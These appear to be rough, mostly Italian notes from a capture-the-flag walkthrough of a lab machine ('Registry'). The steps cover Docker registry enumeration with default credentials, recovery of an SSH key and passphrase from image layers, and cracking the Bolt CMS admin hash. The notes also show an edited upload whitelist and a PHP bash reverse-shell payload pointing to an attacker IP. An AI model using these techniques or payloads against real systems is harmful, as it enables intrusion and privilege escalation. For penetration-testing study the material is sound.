# -A enables OS detection, version probing and the default NSE scripts (the
# ssh-hostkey and ssl-cert output below comes from those). Only the default
# top-1000 TCP ports are covered ("Not shown: 997 closed ports"), so a -p-
# sweep is still worth running before assuming only 22/80/443 are exposed.
nmap -A 10.10.10.159
2Starting Nmap 7.70 ( https://nmap.org ) at 2019-11-04 10:09 CET
3Nmap scan report for 10.10.10.159
4Host is up (0.18s latency).
5Not shown: 997 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
8| ssh-hostkey:
9| 2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
10| 256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
11|_ 256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
1280/tcp open http nginx 1.14.0 (Ubuntu)
13|_http-server-header: nginx/1.14.0 (Ubuntu)
14|_http-title: Welcome to nginx!
15443/tcp open ssl/http nginx 1.14.0 (Ubuntu)
16|_http-server-header: nginx/1.14.0 (Ubuntu)
17|_http-title: Welcome to nginx!
18| ssl-cert: Subject: commonName=docker.registry.htb
19| Not valid before: 2019-05-06T21:14:35
20|_Not valid after: 2029-05-03T21:14:35
21No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
22
23
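# Map every vhost seen in this engagement to the target. docker.registry.htb is
# the CN of the TLS certificate nmap returned; backup.registry.htb is the restic
# target hard-coded in backup.php and the Bolt admin UI is browsed through it
# later, so add all three now instead of one at a time. Appends only names that
# are not already present (must run as root, as the original >> did).
target=10.10.10.159
for host in registry.htb docker.registry.htb backup.registry.htb; do
  # anchor on surrounding whitespace so registry.htb does not match the longer
  # docker.registry.htb entry; commented-out lines are ignored
  if ! grep -qE "^[^#]*[[:space:]]${host}([[:space:]]|\$)" /etc/hosts; then
    printf '%s %s\n' "$target" "$host" >> /etc/hosts
  fi
done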
26
27
28--------------------------------------------------------------------------
29
30
31GENERATED WORDS: 4612
32
33---- Scanning URL: http://docker.registry.htb/ ----
34+ http://docker.registry.htb/v2 (CODE:301|SIZE:39)
35
36
# Repeat the directory brute-force against the TLS vhost. It finds only /v2,
# exactly as on plain HTTP: the Docker Registry HTTP API v2 root, which is what
# the rest of the enumeration goes after.
dirb https://docker.registry.htb
38
39
40
41-----------------
42
43GENERATED WORDS: 4612
44
45---- Scanning URL: https://docker.registry.htb/ ----
46+ https://docker.registry.htb/v2 (CODE:301|SIZE:39)
47
48
49--------------------------------------------------------------------------
50
51
https://docker.registry.htb/v2/ — basic auth: le credenziali di default admin:admin vengono accettate dal registry
53
54
55
56/install
/install/index.php <-------------------- la risposta dichiara Content-Type text/html ma il body è un tar.gz (vedi il base64 sotto) che contiene ca.crt e readme.md
58
59/backup.php
60
61
62
63
64
65
66SFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuMTQuMCAoVWJ1bnR1KQ0KRGF0ZTogTW9uLCAwNCBOb3YgMjAxOSAxMzozMDo1MSBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PVVURi04DQpDb25uZWN0aW9uOiBjbG9zZQ0KU3RyaWN0LVRyYW5zcG9ydC1TZWN1cml0eTogbWF4LWFnZT02MzA3MjAwMDsgaW5jbHVkZVN1YmRvbWFpbnMNClgtRnJhbWUtT3B0aW9uczogREVOWQ0KWC1Db250ZW50LVR5cGUtT3B0aW9uczogbm9zbmlmZg0KQ29udGVudC1MZW5ndGg6IDEwNTANCg0KH4sIAGyDP10AA+3VSa+rNhQA4LvmV0TqMnqXIQSS7mwwYYgJBDLuSJgJhIATCL++N/dVlfo6SVVfq0r+NpbOOcKWbM45B+/nhrx9V9wHWZ5+rpzI/3rlOIHnpDd+IkoiL0wkTn7jeEHgp28j7vse66t7S4JmNHrruu5LGJDgj+r+Kv8/9eUFooVhjxS09g3NUICPPqMMNgyFVRUFRF4COgOCxDCBoRGt1LZ+hwgG3ELxbgvPOE1UF0Gl2wAMcY984MDE3jIQYKxo5uUoXIZQN6cYinvVR1Osbjo7N3rsu4O9vX7EjM8YHn6JdWhAawaD2QLwGwS6ztiU2yrY29y5KrokQdm3uwN3A4BoQLUDr7wFrgZkgKt0c1jabQ3D+HkWMRmTaBODbRrVeR5xrIm48DQ3bmXBqx+RXdwA5V7y1+oRnAx2yvjT5rlPdqd54c0UKRnaixY7aSMTv6yV7BIsHWAOuq+m1lh3FXwFqTpY+6xAQujVrTllhqMVmKeSeFI8uS3z3Bywc3vikLCZWFRCU3NHJxxPZ7VRzNAwU2Y15MlKzidjF0Tz7sw00qPnncOjWx12cpTIPordsnQJe220Vr5K9yOPm+qErNNRGp9aZ79UiSihh15CNdxUPDMs/MGYHIQNrlfyeo9sTmoloov3uA76S10nq2otpN6j8/bN7rlNBXW74I/H+/iyJGKkG8xNMx9mMy3YPuTsMRw/BL1RVmkMEgwBWOSbAa4x5F43FaqJu4PQr61o7aHh4Rf33Z6ZsV01HyaqcwDufADx63HoHkYLFeySb4q/qf36kPSP74N4hqAPVODq7O+9vNfdAxfAZWLPe8618ThNTEN/+MieMEtwTUW1FPbT2yFijxVRrN24rmGzX5bFquSlIjd7qcPGY2OvrFsn6NNtq9d+Dr1jXCGT2ZR3R9+lD0Ub0sXRzC00BhW/Fa8gg5EboQKJxqyyzDa2TC7TVkN+XJ0gOQj9osCDZDOyuY1QPX+E5T2XWQcXZ6JKQtkXGHTVMjOjnJwCYTzvNQuvIjZo1yCP3WjptEsbh03DKJvez/YIKb3mLKrToIcnogf6TckaBOWOjI9pOukO2vZszyYnuZLzwXpORNUu3NDoyZxxsZPfeG/q3fbmbbjW4qoiabK7fPwtXsRKw+zo39U8tI2654gmy0GTCs1mZewtI2r6KWQ+uwKy1d92iv+6i1F/VxMFYRm9l+F33OMv5j8ncPxr/suCIHGixL3mvyTJdP7/G34YOU32CEg0Uq/nImpG6yjJWtI8GebLKCWkbn9k2fB6bt/Dz/z7+Vqyzc81bBjVl+szqxL2T6qjKsmqiG2j873JyJM9Rw3J4uz8sWnL0tZBURRFURRFURRFURRFURRFURRFURT1z/gJNZErZAAoAAAK
67
68
69ca.crt0000775000004100000410000000210613464123607012215 0ustar www-datawww-data
70
71-----BEGIN CERTIFICATE-----
72MIIC/DCCAeSgAwIBAgIJAIFtFmFVTwEtMA0GCSqGSIb3DQEBCwUAMBMxETAPBgNV
73BAMMCFJlZ2lzdHJ5MB4XDTE5MDUwNjIxMTQzNVoXDTI5MDUwMzIxMTQzNVowEzER
74MA8GA1UEAwwIUmVnaXN0cnkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
75AQCw9BmNspBdfyc4Mt+teUfAVhepjje0/JE0db9Iqmk1DpjjWfrACum1onvabI/5
76T5ryXgWb9kS8C6gzslFfPhr7tTmpCilaLPAJzHTDhK+HQCMoAhDzKXikE2dSpsJ5
77zZKaJbmtS6f3qLjjJzMPqyMdt/i4kn2rp0ZPd+58pIk8Ez8C8pB1tO7j3+QAe9wc
78r6vx1PYvwOYW7eg7TEfQmmQt/orFs7o6uZ1MrnbEKbZ6+bsPXLDt46EvHmBDdUn1
79zGTzI3Y2UMpO7RXEN06s6tH4ufpaxlppgOnR2hSvwSXrWyVh2DVG1ZZu+lLt4eHI
80qFJvJr5k/xd0N+B+v2HrCOhfAgMBAAGjUzBRMB0GA1UdDgQWBBTpKeRSEzvTkuWX
818/wn9z3DPYAQ9zAfBgNVHSMEGDAWgBTpKeRSEzvTkuWX8/wn9z3DPYAQ9zAPBgNV
82HRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQABLgN9x0QNM+hgJIHvTEN3
83LAoh4Dm2X5qYe/ZntCKW+ppBrXLmkOm16kjJx6wMIvUNOKqw2H5VsHpTjBSZfnEJ
84UmuPHWhvCFzhGZJjKE+An1V4oAiBeQeEkE4I8nKJsfKJ0iFOzjZObBtY2xGkMz6N
857JVeEp9vdmuj7/PMkctD62mxkMAwnLiJejtba2+9xFKMOe/asRAjfQeLPsLNMdrr
86CUxTiXEECxFPGnbzHdbtHaHqCirEB7wt+Zhh3wYFVcN83b7n7jzKy34DNkQdIxt9
87QMPjq1S5SqXJqzop4OnthgWlwggSe/6z8ZTuDjdNIpx0tF77arh2rUOIXKIerx5B
88-----END CERTIFICATE-----
89
90readme.md0000775000004100000410000000020113472260460012667 0ustar www-datawww-data# Private Docker Registry
91
92- https://docs.docker.com/registry/deploying/
93- https://docs.docker.com/engine/security/certificates/
94
95
96
97/v2/image /manifest
98
99
scaricare i layer dell'immagine bolt-image dal registry e cercarci l'utente bolt e la chiave SSH privata di root (/root/.ssh/id_rsa)

la passphrase della chiave è in chiaro nello script /etc/profile.d/01-ssh.sh (expect) incluso nell'immagine.

usare la chiave con quella passphrase per entrare via SSH sull'host come bolt@registry.htb
105
106
107
108
109
110
111
112
113
114dirbuster http://docker.registry.htb
115
116The methodology for getting the catalog size is:
117
118 GET /v2/_catalog?n=300 (more than our repo count)
119 for each repository returned, GET /v2/[repository_path]/tags/list
120 for each tag listed, GET /v2/[repository_path]/manifests/[tag]
121 from the manifest returned, HEAD /v2/[repository_path]/blobs/[blob_checksum]
122 store the content-length header
123
124
125v2/_catalog
126{"repositories":["bolt-image"]}
127
128
129
130ytc0ytdmnzywnzgxngi0zte0otm3ywzi
131
132
133
134
135
136
137
138
139
140
141
142
143https://github.com/docker/distribution/issues/2212
144
145
146
147
enumerazione del registry docker ---> manifest ---> i blobSum dei layer (tar.gz dei filesystem) da scaricare da /v2/&lt;image&gt;/blobs/&lt;sha256&gt;
149
contenuto dei layer dell'immagine: utente bolt, sito registry.htb/bolt e il CMS Bolt (sorgenti su github)
151
152
153::::::::::::::::::::::::::::
154
155
156http://docker.registry.htb/v2/ admin admin
157
158http://docker.registry.htb/v2/_catalog?n=300
159{"repositories":["bolt-image"]}
160
161
162http://docker.registry.htb/v2/bolt-image/tags/list
163{"name":"bolt-image","tags":["latest"]}
164
165
166http://docker.registry.htb/v2/bolt-image/manifests/latest
167
168
169
170
171
172{
173 "schemaVersion": 1,
174 "name": "bolt-image",
175 "tag": "latest",
176 "architecture": "amd64",
177 "fsLayers": [
178 {
179 "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
180 },
181 {
182 "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
183 },
184 {
185 "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
186 },
187 {
188 "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
189 },
190 {
191 "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
192 },
193 {
194 "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
195 },
196 {
197 "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
198 },
199 {
200 "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
201 },
202 {
203 "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
204 },
205 {
206 "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
207 }
208 ],
209 "history": [
210 {
211 "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
212 },
213 {
214 "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
215 },
216 {
217 "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
218 },
219 {
220 "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
221 },
222 {
223 "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
224 },
225 {
226 "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}"
227 },
228 {
229 "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}"
230 },
231 {
232 "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}"
233 },
234 {
235 "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
236 },
237 {
238 "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
239 }
240 ],
241 "signatures": [
242 {
243 "header": {
244 "jwk": {
245 "crv": "P-256",
246 "kid": "BE5C:NOJP:EOC2:ERND:F2LL:EUKC:5KAA:FAKD:4WV3:SF5Z:T3BE:KD5F",
247 "kty": "EC",
248 "x": "AzGEIs7i0H7UBjuBNzAK81A6-fmLG1Pt2WLvxUsTBGI",
249 "y": "rHfxYV5s6hLG5C6UYcSw6qW0Vd4ZvlI3JyGcBvFLJyI"
250 },
251 "alg": "ES256"
252 },
253 "signature": "Qm65jE1RNqpkHcj0_-MqJ8DnW11rZGR9jEbsDQFe4wWs4I8LuYEWyV6ktxpTy_0T-VQSMRLxSXpvxil0pi4H4Q",
254 "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAxOS0xMS0wNVQwODoyNDoyMVoifQ"
255 }
256 ]
257}
258
259
260
261
registry.htb/backup.php chiama shell_exec() su `sudo restic backup ...`: è il punto in cui il processo web (www-data) lancia restic come root <--------------
263
264
265
266http://docker.registry.htb/v2/bolt-image/blobs/sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
267
268e così tutti gli altri fino a sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff
269
270
271decomprimiamo e cerchiamo informazioni dentro i container
272
273
274::::::::::::::
275INFO UTILI
276::::::::::::::
277
278
279bolt@bolt:/var/www/html$ netstat -an
280Active Internet connections (servers and established)
281Proto Recv-Q Send-Q Local Address Foreign Address State
282tcp 0 0 127.0.0.1:5000 0.0.0.0:* LISTEN
283tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
284tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN
285tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
286tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
287tcp 0 316 10.10.10.159:22 10.10.14.34:53700 ESTABLISHED
288tcp6 0 0 :::80 :::* LISTEN
289tcp6 0 0 :::22 :::* LISTEN
290udp 0 0 127.0.0.53:53 0.0.0.0:*
291
292
293
294
295/var/www/html/sync.sh da vi????? non suid
296/etc/profile.d/01-ssh.sh
297
298
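#!/usr/bin/expect -f
# /etc/profile.d/01-ssh.sh, recovered from the extracted bolt-image layers and
# meant to run at login: it loads root's SSH private key into the agent and
# answers the passphrase prompt itself. (The note that was glued onto the send
# line in the paste would have broken the script; it is moved into comments.)
#eval `ssh-agent -s`
spawn ssh-add /root/.ssh/id_rsa
expect "Enter passphrase for /root/.ssh/id_rsa:"
# Hard-coded passphrase in clear text. Anyone able to pull the image from the
# registry (basic auth admin:admin in these notes) gets both the key under
# /root/.ssh and the secret that unlocks it. This is the SSH key passphrase,
# not a TLS certificate key.
send "GkOcz221Ftb3ugog\n";
expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
interact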
306
307
308git clone https://github.com/bolt/bolt.git <-----git hub????
309
310ssh-keygen -t rsa -b 4096 -C "bolt@registry.htb"
311
312
313
314
315www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
316backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
317list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
318irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
319gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
320nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
321_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
322
323c'è anche user bolt in altri garbage
324
325
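#!/bin/bash
# /var/www/html/sync.sh as found in the image layers (the location note that was
# glued onto the rsync line in the paste is moved up here). Mirrors the Bolt
# site from host "registry" -- the ssh_config alias that resolves to
# bolt@registry.htb -- into the current directory. It documents the
# container -> host SSH path that the leaked root key exploits.
rsync -azP registry:/var/www/html/bolt .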
328
329
.viminfo in /root ha molte informazioni sui comandi lanciati in vim, ma vim non è SUID
331
332
Trovate le chiavi in /root/.ssh del container: la config SSH di root punta a bolt@registry.htb, quindi la chiave di root nel container dà accesso all'host come utente bolt
334
# SSH client config found under /root/.ssh in the container (presumably
# /root/.ssh/config): "registry" is the alias sync.sh rsyncs from, and it logs
# in to the HOST as bolt with root's key. Container root key + the passphrase
# from 01-ssh.sh therefore equals SSH access to the host as bolt.
Host registry
 User bolt
 Port 22
 Hostname registry.htb
339
340passphrase GkOcz221Ftb3ugog
341
342
343System load: 0.0 Users logged in: 0
344 Usage of /: 5.5% of 61.80GB IP address for eth0: 10.10.10.159
345 Memory usage: 23% IP address for br-1bad9bd75d17: 172.18.0.1
346 Swap usage: 0% IP address for docker0: 172.17.0.1
347
348
349ok dentro.....Prendiamo user
350
351bolt@bolt:~$ cat user.txt
352ytc0ytdmnzywnzgxngi0zte0otm3ywzi
353bolt@bolt:~$
354
355
356
357bolt@bolt:/var/www/html$ cat backup.php
<?php
// /var/www/html/backup.php -- runs as www-data; the sudoers entry
// "(root) NOPASSWD: /usr/bin/restic backup -r rest*" makes the inner command
// run as root. shell_exec() returns restic's stdout as a string that is
// discarded here, so the page is blank whether the backup succeeds or not.
shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
359
è di fatto un sudo limitato a quel comando: resta da capire per quale utente vale la regola (non è ALL) — la risposta è nel sudo -l di www-data più sotto
361
362sudo restic backup -r rest:http://backup.registry.htb/bolt bolt
363
364
365
366
367https://github.com/restic/restic
368
restic backup legge i file locali (qui come root, via sudo) e li carica via API REST sul repository indicato con -r; backup.php gira come www-data, quindi è www-data a invocare quel sudo.
370aggiungere un file in
371http://backup.registry.htb/bolt da far scrivere in bolt????
372
373
374
375
376
377
378bolt@bolt:/var/www/html/bolt$ ls
379app codeception.yml composer.lock extensions index.php phpunit.xml.dist src theme
380changelog.md composer.json CONTRIBUTING.md files LICENSE.md README.md tests vendor
381
382sottosito in
383
384
385http://registry.htb/bolt/ <-------------
386
387
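# Quote the pattern: an unquoted *.db is expanded by the shell first, so if the
# cwd happens to contain a .db file find receives that name instead of the glob
# and silently misses everything else in the tree.
find . -name '*.db'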
389./vendor/codeception/codeception/tests/data/sqlite.db
390./tests/phpunit/unit/resources/db/bolt.db
391./app/database/bolt.db
392
393
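# Same quoting fix as for *.db: keep the glob away from the shell so find, not
# the cwd contents, decides what login* matches.
find . -name 'login*'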
395./vendor/codeception/codeception/tests/data/app/view/login.php
396./app/view/twig/login
397./app/view/twig/login/login.twig
398
399
400
# Pull Bolt's SQLite database over SSH with the bolt key. It carries the CMS
# admin's bcrypt ($2y$) password hash, cracked below with john.
scp -i id_rsa bolt@registry.htb:/var/www/html/bolt/app/database/bolt.db ./database.db
402
403usiamo sqlitebrowser. dati importanti
404
405troviamo admin
406$2y$10$e.ChUytg9SrL7AsboF2bX.wWKQ1LkS5Fi3/Z0yYD86.P5E9cpY7PK
407["files://shell.php"]
408
409
410Cost 1 (iteration count) is 1024 for all loaded hashes
411Press 'q' or Ctrl-C to abort, almost any other key for status
412
413strawberry (?) <-----------
414
4151g 0:00:00:12 DONE (2019-11-05 10:33) 0.08143g/s 26.62p/s 26.62c/s 26.62C/s strawberry..dennis
416Use the "--show" option to display all of the cracked passwords reliably
417Session completed
418
419
420
421per scrivere in bolt e aggiungere un file da eseguire al sito es. shell.php bisogna essere www-data l'unico che
422può scrivere in html/bolt
423
movimento laterale: backup.php gira come www-data, ma il restic che lancia gira come root (sudo NOPASSWD) <------
425
426
427
428
creare un file php sul sito bolt ed eseguirlo come www-data, che può leggere la .bash_history ed eseguire sudo restic (esecuzione come root)
430
431
432
433
434
435
436cd bolt
437
438
439
440
441lxd:x:105:65534::/var/lib/lxd/:/bin/false
442uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
443dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
444landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
445pollinate:x:109:1::/var/cache/pollinate:/bin/false
446statd:x:110:65534::/var/lib/nfs:/usr/sbin/nologin
447sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
448bolt:x:1001:1001::/home/bolt:/bin/bash
449vboxadd:x:999:1::/var/run/vboxadd:/bin/false
450git:x:1000:33::/var/www/html:/bin/bash
451
452
bolt ---> git ----> www-data (.bash_history)???? ----> root
454
455
456
457abbiamo admin strawberry. creare pagina su /bolt e eseguire backup come www-data <-----------------
458
459
460
461http://backup.registry.htb/bolt/bolt/login <-----github
462
463accesso admin strawberry
464
465
466
467http://backup.registry.htb/bolt/bolt/files <----- come nel db stack
468
469files://
470
471themes://base-2018
472
473
474uploado un file sotto theme e richiamo il backup.php che mi salva come www-data <----------------------
475
476
477
478
479
480
autorizzo i file con estensione php [NON SI RIESCE A SALVARE IL FILE YAML da backup.registry.htb; da registry.htb, il sito reale, il salvataggio funziona — vedi sotto]
482
483http://backup.registry.htb/bolt/bolt/file/edit/config/config.yml
484
# never allowed: sh, asp, cgi, php, php3, ph3, php4, ph4, php5, ph5, phtm, phtml
# NOTE(review): the line above is only Bolt's advisory comment. In this run
# "php" was added to the list below through the admin file editor and a .php
# upload under /bolt/files/ was then executed by the server, so the editable
# config is the real control: writable config.yml + file upload == code
# execution as www-data.
accept_file_types: [ php, twig, html, js, css, scss, gif, jpg, jpeg, png, ico, zip, tgz, txt, md, doc, docx, pdf, epub, xls, xlsx, ppt, pptx, mp3, ogg, wav, m4a, mp4, m4v, ogv, wmv, avi, webm, svg]
487
488
489
490e se invece la carte
491
492
493
494
495
496
497ls -lisa /var/backups
498total 111292
4992883586 4 drwxr-xr-x 2 root root 4096 May 29 11:05 .
5002883585 4 drwxr-xr-x 14 root root 4096 May 19 22:19 ..
5012886019 111284 -rw-r--r-- 1 root root 113953155 May 29 11:04 bolt.tgz <----?????
502
503
504
505
506
5072891781 0 -rw------- 1 git www-data 0 Oct 8 21:54 .bash_history
508
509
510
511
bolt@bolt:/var/www/html/install$ ls
513index.php
bolt@bolt:/var/www/html/install$ cat index.php <--- dati binari: è il tar.gz con ca.crt e readme.md servito da /install/index.php
515
516
517
518---------------------------------------
519
520
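# Embed a PHP reverse shell in the PNG's EXIF Comment. The original one-liner
# nested single quotes inside a single-quoted argument: the quote ends at
# system(' and the rest, including >& /dev/tcp/..., is parsed as a redirection
# by the attacker's own shell. Keep the outer quoting single, use double quotes
# inside PHP, and invoke bash explicitly -- /dev/tcp is a bash feature that
# /bin/sh (dash on Ubuntu) does not provide.
payload='<?php system("bash -c \"bash -i >& /dev/tcp/10.10.14.34/8000 0>&1\""); ?>'
# Only useful if the file is later served as PHP (e.g. renamed to .php once
# accept_file_types allows it); as a .png the comment is inert bytes.
exiftool -Comment="$payload" ./Desktop/1.png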
522
523
524CMS Bolt - Arbitrary File Upload (Metasploit) | exploits/php/remote/38196.rb
525
526sito reale http://registry.htb/bolt/bolt/login
527
528
529
modificare config.yml da registry.htb e, subito dopo, caricare il file php ed eseguirlo come www-data: va fatto tutto prima che parta il backup, perché quando parte il sito viene sovrascritto (e con esso la modifica a config.yml e il file caricato).
532
